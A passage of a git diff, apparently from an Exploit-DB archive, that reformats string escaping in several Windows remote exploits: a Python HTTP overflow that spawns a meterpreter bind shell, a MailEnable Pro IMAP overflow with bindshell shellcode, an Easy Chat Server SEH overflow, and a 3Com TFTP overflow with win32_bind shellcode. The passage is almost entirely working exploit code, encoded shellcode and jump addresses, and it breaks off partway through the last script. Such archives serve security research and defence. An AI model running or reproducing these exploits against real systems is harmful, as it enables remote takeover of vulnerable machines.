-\"\\xfd\\xee\\x84\\xb6\\x92\\x79\\xcc\\x8a\\xf9\\xd5\\x64\\x37\\xde\\x6a\\x08\"
-\"\\xbe\\x55\\x53\\x64\\xc8\\xc2\\xf3\\x5d\\x12\\xcb\\x79\\xe6\\x35\\xaa\\xec\"
-\"\\x37\\x09\\xfd\\xee\\x31\\x86\\x62\\xd9\\xcc\\x8a\\x21\\xb0\\x59\\x1f\\xc2\"
-\"\\x86\\x23\\x5f\\xaa\\xd0\\x59\\x5f\\xc2\\xde\\x97\\x0c\\x4f\\x79\\xe6\\xcc\"
-\"\\xf9\\xec\\x33\\x09\\xf9\\xd1\\x5b\\x5d\\x73\\x4e\\x6c\\xa0\\x7f\\x87\\xf0\"
-\"\\x76\\x6c\\x03\\xc5\\x2a\\x46\\x45\\x33\\x5f\"
+"\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+"\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
+"\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
+"\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
+"\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
+"\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
+"\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
+"\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
+"\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
+"\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
+"\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
+"\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
+"\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
+"\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
+"\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
+"\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
+"\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
+"\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
+"\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
+"\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
+"\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
+"\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
 )
 
-nop =  \"A\" * 33 + \'\\x90\' * 20
-junk = \"C\" *(515-(len(nop)+len(shellcode)))
-opcode= \"\\x83\\xc4\\x44\\x83\\xc4\\x44\\x83\\xc4\\x44\\xff\\xe4\"
-eip = \'\\x63\\x46\\x92\\x7c\'
+nop =  "A" * 33 + '\x90' * 20
+junk = "C" *(515-(len(nop)+len(shellcode)))
+opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
+eip = '\x63\x46\x92\x7c'
 #7c86467b 7C924663 call esp
-buffer = nop + shellcode + junk + eip + opcode + \"B\" * 60 
+buffer = nop + shellcode + junk + eip + opcode + "B" * 60 
 
-req = (\"GET /\" + buffer + \" HTTP/1.1\\r\\n\"
-\"Host: \" + host + \":\" + str(port) + \"\\r\\n\"
-\"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\\r\\n\"
-\"Connection: keep-alive\\r\\n\\r\\n\")
-print \"  [+] Connecting to %s:%d\" % (host, port)
+req = ("GET /" + buffer + " HTTP/1.1\r\n"
+"Host: " + host + ":" + str(port) + "\r\n"
+"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
+"Connection: keep-alive\r\n\r\n")
+print "  [+] Connecting to %s:%d" % (host, port)
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 	s.connect((host, port))
-	print \"  [+] Sending payload..\" + \"nop: \" + str(len(nop)) + \"   junk: \" + str(len(junk)) + \"   shellcode: \" + str(len(shellcode))
+	print "  [+] Sending payload.." + "nop: " + str(len(nop)) + "   junk: " + str(len(junk)) + "   shellcode: " + str(len(shellcode))
 	s.send(req)
 	data = s.recv(1024)
-	print \"  [+] Closing connection..\"
+	print "  [+] Closing connection.."
 	s.close()
-	print \"[+] Exploit Sent Successfully\"
-    	print \"[+] Waiting for 3 sec before spawning shell to \" + host + \":4444\\r\"
-    	print \"\\r\"
+	print "[+] Exploit Sent Successfully"
+    	print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
+    	print "\r"
     	time.sleep(3)
-        os.system(\"msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E\")
-    	print \"[-] Connection lost from \" + host + \":4444 \\r\"
+        os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
+    	print "[-] Connection lost from " + host + ":4444 \r"
 except:
-    	print \"[-] Could not connect to \" + host + \":4444\\r\"
+    	print "[-] Could not connect to " + host + ":4444\r"
         sys.exit(0) 
diff --git a/platforms/windows/remote/3320.pl b/platforms/windows/remote/3320.pl
index 12fb5df46..1ae4fe319 100755
--- a/platforms/windows/remote/3320.pl
+++ b/platforms/windows/remote/3320.pl
@@ -8,47 +8,47 @@
 # - Tested on: Mail Enable Professional v2.35 (win32)
 #
 # Note: timing is quite critical with this!!, so change $send_delay
-#       if it doesn\'t work....
+#       if it doesn't work....
 #
 ########
 
-use Getopt::Std; getopts(\'t:n:\', \\%arg);
+use Getopt::Std; getopts('t:n:', \%arg);
 use Socket;
 
 # metasploit win32 bindshell port 1337
 my $zshell_win32_bind =
-  \"\\x33\\xc9\\x83\\xe9\\xb0\".
-  \"\\x81\\xc4\\xd0\\xfd\\xff\\xff\".
-  \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x1d\".
-  \"\\xcc\\x32\\x69\\x83\\xeb\\xfc\\xe2\\xf4\\xe1\\xa6\\xd9\\x24\\xf5\\x35\\xcd\\x96\".
-  \"\\xe2\\xac\\xb9\\x05\\x39\\xe8\\xb9\\x2c\\x21\\x47\\x4e\\x6c\\x65\\xcd\\xdd\\xe2\".
-  \"\\x52\\xd4\\xb9\\x36\\x3d\\xcd\\xd9\\x20\\x96\\xf8\\xb9\\x68\\xf3\\xfd\\xf2\\xf0\".
-  \"\\xb1\\x48\\xf2\\x1d\\x1a\\x0d\\xf8\\x64\\x1c\\x0e\\xd9\\x9d\\x26\\x98\\x16\\x41\".
-  \"\\x68\\x29\\xb9\\x36\\x39\\xcd\\xd9\\x0f\\x96\\xc0\\x79\\xe2\\x42\\xd0\\x33\\x82\".
-  \"\\x1e\\xe0\\xb9\\xe0\\x71\\xe8\\x2e\\x08\\xde\\xfd\\xe9\\x0d\\x96\\x8f\\x02\\xe2\".
-  \"\\x5d\\xc0\\xb9\\x19\\x01\\x61\\xb9\\x29\\x15\\x92\\x5a\\xe7\\x53\\xc2\\xde\\x39\".
-  \"\\xe2\\x1a\\x54\\x3a\\x7b\\xa4\\x01\\x5b\\x75\\xbb\\x41\\x5b\\x42\\x98\\xcd\\xb9\".
-  \"\\x75\\x07\\xdf\\x95\\x26\\x9c\\xcd\\xbf\\x42\\x45\\xd7\\x0f\\x9c\\x21\\x3a\\x6b\".
-  \"\\x48\\xa6\\x30\\x96\\xcd\\xa4\\xeb\\x60\\xe8\\x61\\x65\\x96\\xcb\\x9f\\x61\\x3a\".
-  \"\\x4e\\x9f\\x71\\x3a\\x5e\\x9f\\xcd\\xb9\\x7b\\xa4\\x37\\x50\\x7b\\x9f\\xbb\\x88\".
-  \"\\x88\\xa4\\x96\\x73\\x6d\\x0b\\x65\\x96\\xcb\\xa6\\x22\\x38\\x48\\x33\\xe2\\x01\".
-  \"\\xb9\\x61\\x1c\\x80\\x4a\\x33\\xe4\\x3a\\x48\\x33\\xe2\\x01\\xf8\\x85\\xb4\\x20\".
-  \"\\x4a\\x33\\xe4\\x39\\x49\\x98\\x67\\x96\\xcd\\x5f\\x5a\\x8e\\x64\\x0a\\x4b\\x3e\".
-  \"\\xe2\\x1a\\x67\\x96\\xcd\\xaa\\x58\\x0d\\x7b\\xa4\\x51\\x04\\x94\\x29\\x58\\x39\".
-  \"\\x44\\xe5\\xfe\\xe0\\xfa\\xa6\\x76\\xe0\\xff\\xfd\\xf2\\x9a\\xb7\\x32\\x70\\x44\".
-  \"\\xe3\\x8e\\x1e\\xfa\\x90\\xb6\\x0a\\xc2\\xb6\\x67\\x5a\\x1b\\xe3\\x7f\\x24\\x96\".
-  \"\\x68\\x88\\xcd\\xbf\\x46\\x9b\\x60\\x38\\x4c\\x9d\\x58\\x68\\x4c\\x9d\\x67\\x38\".
-  \"\\xe2\\x1c\\x5a\\xc4\\xc4\\xc9\\xfc\\x3a\\xe2\\x1a\\x58\\x96\\xe2\\xfb\\xcd\\xb9\".
-  \"\\x96\\x9b\\xce\\xea\\xd9\\xa8\\xcd\\xbf\\x4f\\x33\\xe2\\x01\\xf2\\x02\\xd2\\x09\".
-  \"\\x4e\\x33\\xe4\\x96\\xcd\\xcc\\x32\\x69\";
+  "\x33\xc9\x83\xe9\xb0".
+  "\x81\xc4\xd0\xfd\xff\xff".
+  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
+  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
+  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
+  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
+  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
+  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
+  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
+  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
+  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
+  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
+  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
+  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
+  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
+  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
+  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
+  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
+  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
+  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
+  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
+  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
+  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
+  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
 
 # ff e4 -> jmp %esp
-my @offsets = ( \"\\xf8\\xfe\\x5a\\x7c\", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
-                \"\\xe2\\x48\\xe6\\x77\", # WinXP SP0 KERNEL32.dll 5.1.2600.0
-                \"\\x06\\x38\\xe6\\x77\", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
-                \"\\xd9\\xae\\x80\\x7c\", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
-                \"\\x62\\x51\\xeb\\x77\", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
-                \"\\xef\\xbe\\xad\\xde\"  # DoS
+my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
+                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
+                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
+                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
+                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
+                "\xef\xbe\xad\xde"  # DoS
               );
 
 &print_header;
@@ -56,12 +56,12 @@ my @offsets = ( \"\\xf8\\xfe\\x5a\\x7c\", # Win2K Server SP4 KERNEL32.dll 5.0.21
 my $target;
 my $offset;
 
-if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
-if (defined($arg{\'n\'})) { $offset = $arg{\'n\'} }
+if (defined($arg{'t'})) { $target = $arg{'t'} }
+if (defined($arg{'n'})) { $offset = $arg{'n'} }
 if (!(defined($target))) { &usage; }
 if (!(defined($offset))) { $offset = 0; }
 if ($offset > $#offsets) {
-    print(\"only \".($#offsets+1).\" targets known!!\\n\");
+    print("only ".($#offsets+1)." targets known!!\n");
     exit(1);
 } else {
     $offset = $offsets[$offset];
@@ -70,22 +70,22 @@ if ($offset > $#offsets) {
 my $imapd_port = 143;
 my $send_delay = 1;
 
-my $NOP = \'A\';
+my $NOP = 'A';
 my $START_PAD = 547;
 my $SHELL_PAD = 12;
 
 if (connect_host($target, $imapd_port)) {
-    print(\"-> * Connected\\n\");
-    $buf = \"A001 LOGIN \\{24\\}\";
-    send(SOCKET, $buf.\"\\r\\n\", 0);
+    print("-> * Connected\n");
+    $buf = "A001 LOGIN \{24\}";
+    send(SOCKET, $buf."\r\n", 0);
     sleep($send_delay);
 
-    print(\"-> * Sending payload\\n\");
+    print("-> * Sending payload\n");
 
-    send(SOCKET, \"AAAAAAAAAAAAAAAAA\\{20\\}\\r\\n\", 0);
+    send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0);
     sleep($send_delay);
 
-    send(SOCKET, \"BBBBBBBBBBBBBBBBBB\\r\\n\", 0);
+    send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0);
     sleep($send_delay);
 
     $buf = ($NOP x $START_PAD).# padding
@@ -95,13 +95,13 @@ if (connect_host($target, $imapd_port)) {
            ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
     send(SOCKET, $buf, 0);
 
-    print(\"-> * Successfully sent payload!\\n\");
-    print(\"-> * nc \".$target.\" 1337 for shell...\\n\");
+    print("-> * Successfully sent payload!\n");
+    print("-> * nc ".$target." 1337 for shell...\n");
 }
 
 sub print_header {
-    print(\"MailEnable Pro <=v2.35 remote exploit\\n\");
-    print(\"by: <mu-b\\@digit-labs.org>\\n\\n\");
+    print("MailEnable Pro <=v2.35 remote exploit\n");
+    print("by: <mu-b\@digit-labs.org>\n\n");
 }
 
 sub usage {
@@ -116,12 +116,12 @@ sub usage {
 
 sub connect_host {
     ($target, $port) = @_;
-    $iaddr  = inet_aton($target)                 || die(\"Error: $!\\n\");
-    $paddr  = sockaddr_in($port, $iaddr)         || die(\"Error: $!\\n\");
-    $proto  = getprotobyname(\'tcp\')              || die(\"Error: $!\\n\");
+    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
+    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
+    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
 
-    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\");
-    connect(SOCKET, $paddr)                      || die(\"Error: $!\\n\");
+    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
+    connect(SOCKET, $paddr)                      || die("Error: $!\n");
     return(1338);
 }
 
diff --git a/platforms/windows/remote/33326.py b/platforms/windows/remote/33326.py
index 10dbee547..72803611f 100755
--- a/platforms/windows/remote/33326.py
+++ b/platforms/windows/remote/33326.py
@@ -1,6 +1,6 @@
 ## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
 ## For this specific exploit to work, easy chat must be installed to:
-## \'C:\\Program Files\\EFS Software\\Easy Chat Server\'
+## 'C:\Program Files\EFS Software\Easy Chat Server'
 
 
 # Exploit Title: Easy Chat Server 3.1 stack buffer overflow
@@ -19,39 +19,39 @@ import socket
 import struct
 
 # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
-# msfencode -b \"\\x00\\x20\" -i w32-exec-calc-shellcode.bin 
+# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin 
 # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
 shellcode = ( 
-\"\\xd9\\xcb\\xbe\\xb9\\x23\\x67\\x31\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\" +
-\"\\xb1\\x13\\x31\\x72\\x19\\x83\\xc2\\x04\\x03\\x72\\x15\\x5b\\xd6\\x56\" +
-\"\\xe3\\xc9\\x71\\xfa\\x62\\x81\\xe2\\x75\\x82\\x0b\\xb3\\xe1\\xc0\\xd9\" +
-\"\\x0b\\x61\\xa0\\x11\\xe7\\x03\\x41\\x84\\x7c\\xdb\\xd2\\xa8\\x9a\\x97\" +
-\"\\xba\\x68\\x10\\xfb\\x5b\\xe8\\xad\\x70\\x7b\\x28\\xb3\\x86\\x08\\x64\" +
-\"\\xac\\x52\\x0e\\x8d\\xdd\\x2d\\x3c\\x3c\\xa0\\xfc\\xbc\\x82\\x23\\xa8\" +
-\"\\xd7\\x94\\x6e\\x23\\xd9\\xe3\\x05\\xd4\\x05\\xf2\\x1b\\xe9\\x09\\x5a\" +
-\"\\x1c\\x39\\xbd\"
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
+"\x1c\x39\xbd"
 )
 
 # SEH overwritten at offset 207 when Easy Chat Server is  
-# installed in C:\\Program Files\\EFS Software\\Easy Chat Server
-payload =  \"A\"*203
-payload += \"\\xeb\\x06\\x90\\x90\"           # short jmp to shellcode
-payload += \"\\x1e\\x0e\\x01\\x10\"           # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
-payload += \"\\x81\\xc4\\xd8\\xfe\\xff\\xff\"   # add esp,-128
+# installed in C:\Program Files\EFS Software\Easy Chat Server
+payload =  "A"*203
+payload += "\xeb\x06\x90\x90"           # short jmp to shellcode
+payload += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
+payload += "\x81\xc4\xd8\xfe\xff\xff"   # add esp,-128
 payload += shellcode                    # calc.exe
-payload += \"D\"*193
+payload += "D"*193
 
 buf = (
-\"GET /chat.ghp?username=\" + payload + \"&password=&room=1&sex=1 HTTP/1.1\\r\\n\"
-\"User-Agent: Mozilla/4.0\\r\\n\"
-\"Host: 192.168.1.136:80\\r\\n\"
-\"Accept-Language: en-us\\r\\n\"
-\"Accept-Encoding: gzip, deflate\\r\\n\"
-\"Referer: http://192.168.1.136\\r\\n\"
-\"Connection: Keep-Alive\\r\\n\\r\\n\"
+"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host: 192.168.1.136:80\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://192.168.1.136\r\n"
+"Connection: Keep-Alive\r\n\r\n"
 )
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-s.connect((\"192.168.123.131\", 80))
+s.connect(("192.168.123.131", 80))
 s.send(buf)
 print s.recv(1024)
diff --git a/platforms/windows/remote/3388.pl b/platforms/windows/remote/3388.pl
index aea721cbe..9e79a8f5a 100755
--- a/platforms/windows/remote/3388.pl
+++ b/platforms/windows/remote/3388.pl
@@ -19,7 +19,7 @@
 # 
 # So here you go.
 #
-# Buffer = \"\\x00\\x02\"      +  \"filename\"    +  \"\\x00\" +  nop sled +  Shellcode + JUMP  + \"\\x00\";
+# Buffer = "\x00\x02"      +  "filename"    +  "\x00" +  nop sled +  Shellcode + JUMP  + "\x00";
 # 
 #
 # This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
@@ -30,61 +30,61 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print \"\\n3COM Tftp long transport name exploit\\n\";
- print \"\\tCoded by Umesh wanve\\n\\n\";
- print \"Use: 3com_tftp.pl <host> <port>\\n\\n\";
+ print "\n3COM Tftp long transport name exploit\n";
+ print "\tCoded by Umesh wanve\n\n";
+ print "Use: 3com_tftp.pl <host> <port>\n\n";
  exit;
 }
 
 
-$target = IO::Socket::INET->new(Proto=>\'udp\',
+$target = IO::Socket::INET->new(Proto=>'udp',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die \"Cannot connect to $ARGV[0] on port $ARGV[1]\";
+                            or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
 
 
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
  
 my($shellcode)=
-\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x48\".
-\"\\xc8\\xb3\\x54\\x83\\xeb\\xfc\\xe2\\xf4\\xb4\\xa2\\x58\\x19\\xa0\\x31\\x4c\\xab\".
-\"\\xb7\\xa8\\x38\\x38\\x6c\\xec\\x38\\x11\\x74\\x43\\xcf\\x51\\x30\\xc9\\x5c\\xdf\".
-\"\\x07\\xd0\\x38\\x0b\\x68\\xc9\\x58\\x1d\\xc3\\xfc\\x38\\x55\\xa6\\xf9\\x73\\xcd\".
-\"\\xe4\\x4c\\x73\\x20\\x4f\\x09\\x79\\x59\\x49\\x0a\\x58\\xa0\\x73\\x9c\\x97\\x7c\".
-\"\\x3d\\x2d\\x38\\x0b\\x6c\\xc9\\x58\\x32\\xc3\\xc4\\xf8\\xdf\\x17\\xd4\\xb2\\xbf\".
-\"\\x4b\\xe4\\x38\\xdd\\x24\\xec\\xaf\\x35\\x8b\\xf9\\x68\\x30\\xc3\\x8b\\x83\\xdf\".
-\"\\x08\\xc4\\x38\\x24\\x54\\x65\\x38\\x14\\x40\\x96\\xdb\\xda\\x06\\xc6\\x5f\\x04\".
-\"\\xb7\\x1e\\xd5\\x07\\x2e\\xa0\\x80\\x66\\x20\\xbf\\xc0\\x66\\x17\\x9c\\x4c\\x84\".
-\"\\x20\\x03\\x5e\\xa8\\x73\\x98\\x4c\\x82\\x17\\x41\\x56\\x32\\xc9\\x25\\xbb\\x56\".
-\"\\x1d\\xa2\\xb1\\xab\\x98\\xa0\\x6a\\x5d\\xbd\\x65\\xe4\\xab\\x9e\\x9b\\xe0\\x07\".
-\"\\x1b\\x9b\\xf0\\x07\\x0b\\x9b\\x4c\\x84\\x2e\\xa0\\xa2\\x08\\x2e\\x9b\\x3a\\xb5\".
-\"\\xdd\\xa0\\x17\\x4e\\x38\\x0f\\xe4\\xab\\x9e\\xa2\\xa3\\x05\\x1d\\x37\\x63\\x3c\".
-\"\\xec\\x65\\x9d\\xbd\\x1f\\x37\\x65\\x07\\x1d\\x37\\x63\\x3c\\xad\\x81\\x35\\x1d\".
-\"\\x1f\\x37\\x65\\x04\\x1c\\x9c\\xe6\\xab\\x98\\x5b\\xdb\\xb3\\x31\\x0e\\xca\\x03\".
-\"\\xb7\\x1e\\xe6\\xab\\x98\\xae\\xd9\\x30\\x2e\\xa0\\xd0\\x39\\xc1\\x2d\\xd9\\x04\".
-\"\\x11\\xe1\\x7f\\xdd\\xaf\\xa2\\xf7\\xdd\\xaa\\xf9\\x73\\xa7\\xe2\\x36\\xf1\\x79\".
-\"\\xb6\\x8a\\x9f\\xc7\\xc5\\xb2\\x8b\\xff\\xe3\\x63\\xdb\\x26\\xb6\\x7b\\xa5\\xab\".
-\"\\x3d\\x8c\\x4c\\x82\\x13\\x9f\\xe1\\x05\\x19\\x99\\xd9\\x55\\x19\\x99\\xe6\\x05\".
-\"\\xb7\\x18\\xdb\\xf9\\x91\\xcd\\x7d\\x07\\xb7\\x1e\\xd9\\xab\\xb7\\xff\\x4c\\x84\".
-\"\\xc3\\x9f\\x4f\\xd7\\x8c\\xac\\x4c\\x82\\x1a\\x37\\x63\\x3c\\xb8\\x42\\xb7\\x0b\".
-\"\\x1b\\x37\\x65\\xab\\x98\\xc8\\xb3\\x54\";
+"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
+"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
+"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
+"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
+"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9c\x97\x7c".
+"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x17\xd4\xb2\xbf".
+"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\xc3\x8b\x83\xdf".
+"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x06\xc6\x5f\x04".
+"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x17\x9c\x4c\x84".
+"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\xc9\x25\xbb\x56".
+"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x9e\x9b\xe0\x07".
+"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x2e\x9b\x3a\xb5".
+"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x1d\x37\x63\x3c".
+"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\xad\x81\x35\x1d".
+"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x31\x0e\xca\x03".
+"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\xc1\x2d\xd9\x04".
+"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\xe2\x36\xf1\x79".
+"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\xb6\x7b\xa5\xab".
+"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x19\x99\xe6\x05".
+"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\xb7\xff\x4c\x84".
+"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\xb8\x42\xb7\x0b".
+"\x1b\x37\x65\xab\x98\xc8\xb3\x54";
 
 
 
-print \"++ Building Malicous Packet .....\\n\";
+print "++ Building Malicous Packet .....\n";
 
-$nop=\"\\x90\" x 129;  
+$nop="\x90" x 129;  
 
 
-$jmp_2000 = \"\\x0e\\x08\\xe5\\x77\";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
+$jmp_2000 = "\x0e\x08\xe5\x77";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
 
 
-$exploit = \"\\x00\\x02\";                                      #write request (header)
